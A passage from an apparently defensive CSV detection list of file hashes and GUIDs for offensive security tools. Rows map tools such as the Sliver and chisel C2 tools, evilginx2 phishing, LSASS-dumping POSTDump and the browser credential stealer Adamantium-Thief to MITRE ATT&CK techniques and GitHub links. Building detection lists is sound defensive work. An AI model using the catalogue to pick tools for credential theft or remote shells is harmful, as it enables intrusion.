solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*e27f5050d889525c51431074c81403d6917f081af8694a978e92a975a5b67472*",".{0,1000}e27f5050d889525c51431074c81403d6917f081af8694a978e92a975a5b67472.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*e281c4aeeb508f9ec7abdaedde54203747ef31b02b97aa21ea7a2c4c06659f11*",".{0,1000}e281c4aeeb508f9ec7abdaedde54203747ef31b02b97aa21ea7a2c4c06659f11.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*e2940f2785f9f9b38e5cac80100a401145f558602a7af45475760884aeba44f9*",".{0,1000}e2940f2785f9f9b38e5cac80100a401145f558602a7af45475760884aeba44f9.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" 
"*e2964ea4bc4e439e55f46ed309904e9592145858076d65363a2bbbab0bd608cc*",".{0,1000}e2964ea4bc4e439e55f46ed309904e9592145858076d65363a2bbbab0bd608cc.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*e2c4f99f6a5d7bd663caba698a5867963fa2917201dcad6e94de8ff4a3f6a256*",".{0,1000}e2c4f99f6a5d7bd663caba698a5867963fa2917201dcad6e94de8ff4a3f6a256.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*E2E64E89-8ACE-4AA1-9340-8E987F5F142F*",".{0,1000}E2E64E89\-8ACE\-4AA1\-9340\-8E987F5F142F.{0,1000}","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","0","N/A","10","6","564","86","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" "*e2ea75cda1cbe2d628b20a93a49904f17d158866a644ff262d3c59731418c9a9*",".{0,1000}e2ea75cda1cbe2d628b20a93a49904f17d158866a644ff262d3c59731418c9a9.{0,1000}","offensive_tool_keyword","pyrdp","RDP 
monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*e2fc147f2ac14938a48eebc9292258af10edcc7ef057acd07ff2ae6729f1cb7a*",".{0,1000}e2fc147f2ac14938a48eebc9292258af10edcc7ef057acd07ff2ae6729f1cb7a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*E2FDD6CC-9886-456C-9021-EE2C47CF67B7*",".{0,1000}E2FDD6CC\-9886\-456C\-9021\-EE2C47CF67B7.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","N/A","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","0","N/A","10","6","558","73","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z" "*e3038dfa23e4c4707e73f5b4a214fe35796b805ef213e0e84da1e20cd5643fa5*",".{0,1000}e3038dfa23e4c4707e73f5b4a214fe35796b805ef213e0e84da1e20cd5643fa5.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*e3130262a4adfed3a225075d6eb93c5caeeba93b1253dc1b148f8a80c5c35a03*",".{0,1000}e3130262a4adfed3a225075d6eb93c5caeeba93b1253dc1b148f8a80c5c35a03.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the 
bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*e32a0a69f8d98f79823aa087f883b16e04b4993090aedc0e29ca11b571e1bc4d*",".{0,1000}e32a0a69f8d98f79823aa087f883b16e04b4993090aedc0e29ca11b571e1bc4d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*e370fb7d05e5b2ede88b633c05b9b21aa073678c392dda6407c112afe3430a61*",".{0,1000}e370fb7d05e5b2ede88b633c05b9b21aa073678c392dda6407c112afe3430a61.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e3731ce37c3e570254e35ac1201483592e708b43c898b3b21cca71a9f401d214*",".{0,1000}e3731ce37c3e570254e35ac1201483592e708b43c898b3b21cca71a9f401d214.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e376445d4c432d5f3c61e4584974941028c2975b97ee1461e4f00c65eb09a0ed*",".{0,1000}e376445d4c432d5f3c61e4584974941028c2975b97ee1461e4f00c65eb09a0ed.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","0","N/A","8","10","3","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z" "*e376d23f48816e9d9a8d74cc9f8891b6fed2cff46d2b0efe989d8272b05931f2*",".{0,1000}e376d23f48816e9d9a8d74cc9f8891b6fed2cff46d2b0efe989d8272b05931f2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e379046040e17b60f1311e1d406a5bd9e34fd3f8b9e22cbceed612a6c3a689a9*",".{0,1000}e379046040e17b60f1311e1d406a5bd9e34fd3f8b9e22cbceed612a6c3a689a9.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","0","N/A","8","10","3","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z" "*e3a6fd1ebf5912045e94cbe9cf44ec388351c89aab2054a647332e41f70f27df*",".{0,1000}e3a6fd1ebf5912045e94cbe9cf44ec388351c89aab2054a647332e41f70f27df.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*e3a9b1c8dfe7bfcebd4d908f7cc36df8d09ee579ab10738308f0536782a14fe2*",".{0,1000}e3a9b1c8dfe7bfcebd4d908f7cc36df8d09ee579ab10738308f0536782a14fe2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - 
T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*e3e2ced2569d1ebef8f65b554979747881e5e060355fa6698c913036dfd892ba*",".{0,1000}e3e2ced2569d1ebef8f65b554979747881e5e060355fa6698c913036dfd892ba.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*e3f64597d5022d8716f45ffe57fb9f5f25ff64f42b9b61a0a64cb4521a453ebc*",".{0,1000}e3f64597d5022d8716f45ffe57fb9f5f25ff64f42b9b61a0a64cb4521a453ebc.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*e43289578251611f4f6f9952fa6ec598ed69b71c60ddc9077e69495fce018838*",".{0,1000}e43289578251611f4f6f9952fa6ec598ed69b71c60ddc9077e69495fce018838.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 
"*e4501ae5fc883efc3f0491b2d277e76fbb6d5b4d6618a2221d9fe08e8af41d00*",".{0,1000}e4501ae5fc883efc3f0491b2d277e76fbb6d5b4d6618a2221d9fe08e8af41d00.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e45f0bbbeee0fc901b50a0034dbeee8a1f2fe8b60ac58309580b3f7659dd9784*",".{0,1000}e45f0bbbeee0fc901b50a0034dbeee8a1f2fe8b60ac58309580b3f7659dd9784.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*e475c6f8ad8471fe068b1cbce42300ecffb7e6825ba88bf7dff8c2969562f595*",".{0,1000}e475c6f8ad8471fe068b1cbce42300ecffb7e6825ba88bf7dff8c2969562f595.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e4ae0aec069aa237c5408c25c838464a65f7ca4e87453e6191f0629909fb2dfa*",".{0,1000}e4ae0aec069aa237c5408c25c838464a65f7ca4e87453e6191f0629909fb2dfa.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e4df5a904c8eb505cb63d9905c398f632cf97ba193a6e25569d561d44f69e623*",".{0,1000}e4df5a904c8eb505cb63d9905c398f632cf97ba193a6e25569d561d44f69e623.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - 
TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","N/A","7","6","551","100","2022-08-12T01:56:15Z","2016-04-28T16:45:02Z" "*e4f33ee9ba4d86685f8df4a89e192a354139edcf*",".{0,1000}e4f33ee9ba4d86685f8df4a89e192a354139edcf.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*e50bd0143399ca09e3a293f2546cdacb0bf093294dda39263474ed55d8e1743d*",".{0,1000}e50bd0143399ca09e3a293f2546cdacb0bf093294dda39263474ed55d8e1743d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*e5139e7b40768b3a2a6be05138cd8c5cd5fc71eb60b108e0743077f0e4df3a4d*",".{0,1000}e5139e7b40768b3a2a6be05138cd8c5cd5fc71eb60b108e0743077f0e4df3a4d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*e52f7c5cdfbcfd07c3af1a5d4b192e804f2a29cc1cacff6573ad701cbeb8440a*",".{0,1000}e52f7c5cdfbcfd07c3af1a5d4b192e804f2a29cc1cacff6573ad701cbeb8440a.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in 
C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*E54195F0-060C-4B24-98F2-AD9FB5351045*",".{0,1000}E54195F0\-060C\-4B24\-98F2\-AD9FB5351045.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*E54195F0-060C-4B24-98F2-AD9FB5351045*",".{0,1000}E54195F0\-060C\-4B24\-98F2\-AD9FB5351045.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*E54195F0-060C-4B24-98F2-AD9FB5351045*",".{0,1000}E54195F0\-060C\-4B24\-98F2\-AD9FB5351045.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*e54299149f25b882cb0900a2977eb6d72a4fa88fb96b67b370981b42b66d7733*",".{0,1000}e54299149f25b882cb0900a2977eb6d72a4fa88fb96b67b370981b42b66d7733.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" 
"*e55c85d7da9a60ed31867b421961b3503df0b464e068e584fccc20892b05bef2*",".{0,1000}e55c85d7da9a60ed31867b421961b3503df0b464e068e584fccc20892b05bef2.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*e56cc23ffa05a02bdb22fd0db6b82e1b91d64ce467bf9be73236edab7cf11af2*",".{0,1000}e56cc23ffa05a02bdb22fd0db6b82e1b91d64ce467bf9be73236edab7cf11af2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e58bed7731a0a2a03e7c402d88a76a7d08c932494d6f5f78c0bc5f35b16ba9f6*",".{0,1000}e58bed7731a0a2a03e7c402d88a76a7d08c932494d6f5f78c0bc5f35b16ba9f6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e59ca634fa9b25563346bcb14e9e97d40dbfacc3159291aae5b104e99caede32*",".{0,1000}e59ca634fa9b25563346bcb14e9e97d40dbfacc3159291aae5b104e99caede32.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*e5a991c13b8ba7bd2e435dec2682cd31de0013b3455c18e3883608e75363de3b*",".{0,1000}e5a991c13b8ba7bd2e435dec2682cd31de0013b3455c18e3883608e75363de3b.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*e5c8fd6cca1c71cb4302024e18e2ffb1d2cb00b583f391368adb5a73b803e3b0*",".{0,1000}e5c8fd6cca1c71cb4302024e18e2ffb1d2cb00b583f391368adb5a73b803e3b0.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*e5d6eb36d1fe75a3f558093179a13f0cd74a661397eba1c7a0963200a8a365c0*",".{0,1000}e5d6eb36d1fe75a3f558093179a13f0cd74a661397eba1c7a0963200a8a365c0.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*E6104BC9-FEA9-4EE9-B919-28156C1F2EDE*",".{0,1000}E6104BC9\-FEA9\-4EE9\-B919\-28156C1F2EDE.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","10","8","747","201","2022-12-08T11:06:46Z","2020-03-01T06:50:15Z" 
"*e614bcf1b052fd1faf384fea62ddc4365051cef7bced133d54cd972be74e550f*",".{0,1000}e614bcf1b052fd1faf384fea62ddc4365051cef7bced133d54cd972be74e550f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*e62d0d5e71daca0aa1c2e899b0da9668167fcbd20060ef8c01a8d8b66f0a32b3*",".{0,1000}e62d0d5e71daca0aa1c2e899b0da9668167fcbd20060ef8c01a8d8b66f0a32b3.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*e62f551dcaca8e16effff14816c75f5838640a23112052b50d99999bb4db7f1d*",".{0,1000}e62f551dcaca8e16effff14816c75f5838640a23112052b50d99999bb4db7f1d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
